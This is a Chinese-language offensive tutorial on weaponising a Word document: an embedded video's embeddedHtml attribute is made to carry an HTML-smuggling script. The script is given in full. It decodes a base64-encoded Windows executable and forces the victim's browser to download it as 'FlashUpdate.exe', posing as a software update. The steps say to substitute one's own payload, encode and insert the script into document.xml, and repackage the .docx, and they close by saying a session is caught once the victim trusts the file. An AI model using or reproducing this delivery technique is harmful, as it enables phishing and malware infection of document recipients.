Word文档嵌入视频

该方法会在文档中嵌入视频,当受害者打开文档播放视频时,会触发HTML走私来交付Payload。

首先,我们需要新建一个Word文档并插入视频:

插入视频后保存文件并重命名为.zip后缀格式后解压:

进入word目录并编辑document.xml文件,其中embeddedHtml属性是嵌入视频的位置:

然后我们编写如下代码进行走私:

<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US-x-Hixie" dir="ltr">
<body>
<script>

(function() {

  function base64ToBlob(base64, mime) {
    mime = mime || '';
    var sliceSize = 1024;
    var byteChars = window.atob(base64);
    var byteArrays = [];

    for (var offset = 0, len = byteChars.length; offset < len; offset += sliceSize) {
      var slice = byteChars.slice(offset, offset + sliceSize);

      var byteNumbers = new Array(slice.length);
      for (var i = 0; i < slice.length; i++) {
        byteNumbers[i] = slice.charCodeAt(i);
      }

      var byteArray = new Uint8Array(byteNumbers);

      byteArrays.push(byteArray);
    }

    return new Blob(byteArrays, {type: mime});
  }

  if (typeof exports !== 'undefined') {
    if (typeof module !== 'undefined' && module.exports) {
      exports = module.exports = base64ToBlob;
    }
    exports.base64ToBlob = base64ToBlob;
  } else if (typeof define === 'function' && define.amd) {
    define([], function() {
      return base64ToBlob;
    });
  } else {
    this.base64ToBlob = base64ToBlob;
  }

}).call(this);
</script>


<script>
    var data = 'TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAG0wpNAAAAAAAAAAAOAAIgALATAAAAgAAAAIAAAAAAAAriYAAAAgAAAAQAAAAABAAAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAACAAAAAAgAAAAAAAAMAQIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAFkmAABPAAAAAEAAAIwFAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAwAAADIJQAAOAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAAtAYAAAAgAAAACAAAAAIAAAAAAAAAAAAAAAAAACAAAGAucnNyYwAAAIwFAAAAQAAAAAYAAAAKAAAAAAAAAAAAAAAAAABAAABALnJlbG9jAAAMAAAAAGAAAAACAAAAEAAAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAACNJgAAAAAAAEgAAAACAAUAaCAAAGAFAAABAAAAAQAABgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADJyAQAAcCgOAAAKJioeAigPAAAKKgAAAEJTSkIBAAEAAAAAAAwAAAB2Mi4wLjUwNzI3AAAAAAUAbAAAANQBAAAjfgAAQAIAADwCAAAjU3RyaW5ncwAAAAB8BAAAFAAAACNVUwCQBAAAEAAAACNHVUlEAAAAoAQAAMAAAAAjQmxvYgAAAAAAAAACAAABRxUAAAkAAAAA+gEzABYAAAEAAAARAAAAAgAAAAIAAAABAAAADwAAAA0AAAABAAAAAgAAAAAAZQEBAAAAAAAGANoAzQEGAEcBzQEGACcAmwEPAO0BAAAGAE8AgwEGAL0AgwEGAJ4AgwEGAC4BgwEGAPoAgwEGABMBgwEGAGYAgwEGADsArgEGABkArgEGAIEAgwEGABYCdwEKAC8CAQIKAB0CAQIAAAAAAQAAAAAAAQABAAAAEABvARMAPQABAAEAUCAAAAAAkQB+ASkAAQBdIAAAAACGGJUBBgACAAAAAQD8AQkAlQEBABEAlQEGABkAlQEKACkAlQEQADEAlQEQADkAlQEQAEEAlQEQAEkAlQEQAFEAlQEQAFkAlQEQAGEAlQEVAGkAlQEQAHEAlQEQAIEAKgIaAHkAlQEGAC4ACwAvAC4AEwA4AC4AGwBXAC4AIwBgAC4AKwBrAC4AMwBrAC4AOwBrAC4AQwBgAC4ASwBxAC4AUwBrAC4AWwBrAC4AYwCJAC4AawCzAASAAAABAAAAAAAAAAAAAAAAABMAAAACAAAAAAAAAAAAAAAgAAoAAAAAAAIAAAAAAAAAAAAAACAAAQIAAAAAAAAAAAA8TW9kdWxlPgBtc2NvcmxpYgBQd25lZABHdWlkQXR0cmlidXRlAERlYnVnZ2FibGVBdHRyaWJ1dGUAQ29tVmlzaWJsZUF0dHJpYnV0ZQBBc3NlbWJseVRpdGxlQXR0cmlidXRlAEFzc2VtYmx5VHJhZGVtYXJrQXR0cmlidXRlAEFzc2VtYmx5RmlsZVZlcnNpb25BdHRyaWJ1dGUAQXNzZW1ibHlDb25maWd1cmF0aW9uQXR0cmlidXRlAEFzc2VtYmx5RGVzY3JpcHRpb25BdHRyaWJ1dGUAQ29tcGlsYXRpb25SZWxheGF0aW9uc0F0dHJpYnV0ZQBBc3NlbWJseVByb2R1Y3RBdHRyaWJ1dGUAQXNzZW1ibHlDb3B5cmlnaHRBdHRyaWJ1dGUAQXNzZW1ibHlDb21wYW55QXR0cmlidXRlAFJ1bnRpbWVDb21wYXRpYmlsaXR5QXR0cmlidXRlAFB3bmVkLmV4ZQBQcm9ncmFtAFN5c3RlbQBNYWluAFN5c3RlbS5SZWZsZWN0aW9uAC5jdG9yAFN5c3RlbS5EaWFnbm9zdGljcwBTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXMAU3lzdGVtLlJ1bnRpbWUuQ29tcGlsZXJTZXJ2aWNlcwBEZWJ1Z2dpbmdNb2RlcwBhcmdzAFN5c3RlbS5XaW5kb3dzLkZvcm1zAE9iamVjdABEaWFsb2dSZXN1bHQAU2hvdwBNZXNzYWdlQm94AAAAAA9QAHcAbgBlAGQAIQAhAAAAAADhYboTmGh/RLqZGa5x0pDe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'
    var blob = base64ToBlob(data, 'application/octet-stream');
    if (navigator.msSaveOrOpenBlob)  // IE hack;
    navigator.msSaveOrOpenBlob(blob, "FlashUpdate.exe");
else
{
    var a = window.document.createElement("a");
    a.href = window.URL.createObjectURL(blob, {type: "application/octet-stream"});
    a.download = "FlashUpdate.exe";
    document.body.appendChild(a);
    a.click();  // IE: "Access is denied";
    document.body.removeChild(a);
}
</script>
</body>
</html>

可以将代码中的Base64编码的Bolb替换为自己的payload。

然后对其进行HTML实体编码,可以访问Mothere网站进行编码:

将编码后的内容添加到embeddedHtml属性:

然后在视频链接前加上iframe标签使其能够显示。

最后保存文件,并将所有文件重新压缩为.zip,然后重命名后缀为.docx:

再次打开后,会询问是否信任文档的来源,点击是,即可监听到会话: